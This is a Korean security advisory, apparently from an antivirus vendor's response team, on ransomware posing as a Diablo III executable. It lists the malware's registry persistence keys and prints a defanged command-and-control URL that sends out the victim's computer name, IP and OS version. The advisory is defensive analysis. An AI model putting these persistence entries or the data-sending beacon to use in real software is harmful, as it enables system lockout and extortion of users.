[주의]디아블로3 파일로 변장한 랜섬웨어형 악성파일 등장

1. 개요

잉카인터넷 대응팀은 2012년 5월 초 공개된 블리자드 엔터테인먼트사의 디아블로 3(Diablo III)와 관련된 파일처럼 위장한 랜섬웨어(Ransomware)종류의 악성파일이 해외에서 유포된 것을 발견하였다. 랜섬웨어란 사이버 범죄자들이 컴퓨터의 운영체제나 특정 파일들을 암호화하여 사용자가 정상적으로 이용하지 못하게 만든 후 이를 볼모로 돈을 요구하는 형식의 악성파일을 말한다. 초기에는 특정 문서파일들을 암호화하는 형태가 많았고, 최근에는 운영체제 자체를 사용하지 못하게 하는 종류가 많이 이용되고 있다. 특히, 경찰청 · 저작권협회와 같은 기관처럼 위장한 문구 등을 이용해서 "당신의 컴퓨터에서 불법 행위가 감지됐고, 법을 위반함에 따라 운영체제를 잠근다"는 허위 문구를 출력해서 벌금 요구 등을 사칭하여 돈을 요구하는 형태도 유럽 각지에서 다수 보고되고 있어 각별한 주의가 필요하다.

---

- 디아블로3 게임 파일로 사칭한 랜섬웨어 주의
- 변장의 달인 랜섬웨어
- OS, 문서를 암호화한 후 돈을 송금하면 해독키를 보내주겠다고 현혹
- 금전적 피해를 입히는 랜섬웨어는 사전 예방이 무엇보다 중요!
- 내 파일을 보는데 돈을 내라고? 도대체 왜 이러는 걸까요?

■ 랜섬웨어(Ransomware) :

랜섬웨어란 Ransom(몸값)과 Ware(제품)의 합성어로서 컴퓨터 내부의 운영체제나 (문서)파일들을 암호화하여 인질로 잡고 돈을 보내면 해독용 복호화키를 전송해 주겠다며 금품을 요구하는 악성프로그램을 의미한다.

2. 악성파일 정보

[정보]나도 모르게 설치된 그것이 알고 싶다.
☞ http://erteam.nprotect.com/269

약 12년만에 출시한 디아블로3 게임의 인기와 뜨거운 관심은 현재 PC방 점유율 부분에서 1위를 차지하고 있을 정도이며, 끝 없는 인기 고공행진을 이어가고 있는 상태이다. 이런 인기를 반영하듯이 악성파일 제작자들도 사회공학적 기법 등을 이용하여 디아블로3 내용처럼 교묘히 꾸며진 악성파일 유포를 시도하고 있다.

이번에 발견된 파일은 "Diablo_III.exe" 라는 파일명을 가지고 있어 마치 디아블로3 게임과 관련된 파일처럼 보이도록 조작되어 있는 것이 특징이고, Application Data 폴더에 자신을 복사하여 작동된다.

악성파일이 실행되면 레지스트리를 조작하여 재부팅시 자동으로 실행되도록 만들고, 작업관리자 등도 사용하지 못하도록 조작한다. 그리고 컴퓨터 운영체제 화면을 변경하여 사용자의 정상적인 컴퓨터 이용을 방해한다.

HKLM\Software\Microsoft\Active Setup\Installed Components\{Gusfa7ep-lUCJ-Ed2r-Yvs8-fYwL6tnW7CxX}\9txXqR9p2lPiFxH: %Appdata%\Diablo_III.exe /ActiveX
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\9txXqR9p2lPiFxH: %Appdata%\Diablo_III.exe
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\9txXqR9p2lPiFxH: %Appdata%\Diablo_III.exe
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell: %Appdata%\Diablo_III.exe
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit: %Appdata%\Diablo_III.exe,%WinDir%\System32\userinit.exe,
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell: %Appdata%\Diablo_III.exe
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit: %Appdata%\Diablo_III.exe,%WinDir%\System32\userinit.exe,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
DisableTaskMgr = "1"

또한, 사용자의 컴퓨터 이름과 운영체제명, IP주소 등이 외부로 유출시도될 수 있다.

hxxp://galbbza.com/partner2/universalpanel/gate.php?hwid=4281525696&pc=COMPUTERNAME&localip=192.168.0.1&winver=Windows XP Professional x32

아래 화면은 독일의 "저작권 침해 기소"와 관련된 웹사이트인 GVU(http://www.gvu.de) 내용처럼 조작되어 있다. 이 때문에 해당 사이트에는 악성파일에 대한 정보를 제공하고 있기도 하다.

☞ http://www.gvu.de/index.php?id=39

악성파일에 의해서 위와같은 화면이 보여지고 컴퓨터 사용이 전면 불가능하게 된다. 화면에는 독일어로 정상적인 복호화 코드를 입력하도록 유혹하고, 코드를 받기 위해서는 유럽연합의 단일화폐인 50유로 등을 지불하도록 유도한다.

2011년 하반기부터 유럽 등지에서 랜섬웨어가 기승을 부리고 있는데, 대표적인 수법은 특정 국가의 경찰청 등에서 보낸 내용처럼 위장하며, 사용자 컴퓨터에서 불법 행위가 감지됐고, 해당 국가의 법을 위반하여 운영체제를 잠근다는 문구를 보여준다. 그리고 24시간 내에 벌금을 지불하도록 요구하고 만약 돈을 보내지 않으면 하드 디스크내의 내용을 모두 삭제할 것이다라는 위협을 하기도 한다.

아래 슬라이드쇼 화면은 다양한 형태로 만들어진 랜섬웨어 감염 화면이며, 독일/스위스/영국/오스트리아 등의 국가를 표적으로 제작된 것들이 대표적이다.

0123456789

3. 마무리

해당 악성파일들은 대부분 해킹된 해외 웹사이트와 각종 보안취약점을 이용해서 유포되었으며 MS OS/Office, Adobe Flash Player/Reader, JAVA 등의 취약점을 널리 이용한다.

따라서 반드시 마이크로 소프트사의 운영체제 및 오피스 프로그램을 항시 최신 버전으로 업데이트하여 사용하고, 특히 Adobe 제품과 자바 업데이트 등도 꾸준히 가장 최신 버전을 유지하도록 하는 관심이 중요하다.

개그콘서트에 없는 네가지? 오해하지마! 보안 업데이트
☞ http://erteam.nprotect.com/250

위와 같은 악성파일로 부터 안전한 PC사용을 유지하기 위해서 아래와 같은 기본적인 보안 관리 수칙을 준수하여 악성파일 감염을 사전에 예방할 수 있도록 하자.

※ 보안 관리 수칙

1. 윈도우와 같은 OS 및 각종 응용 프로그램의 최신 보안 패치 생활화.

2. 신뢰할 수 있는 보안업체의 백신을 설치 후 최신 엔진 및 패턴버전으로 업데이트해 실시간 감시 기능을 항상 "ON"상태로 유지하여 사용한다.

3. 출처가 불분명한 이메일에 대한 열람 및 첨부파일에 대한 다운로드/실행을 자제한다.

4. 인스턴트 메신저, SNS 등을 통해 접근이 가능한 링크 접속시 주의

※ 잉카인터넷 대응팀에서는 각종 보안 위협에 대비하기 위해 24시간 지속적인 대응체계를 유지하고 있다.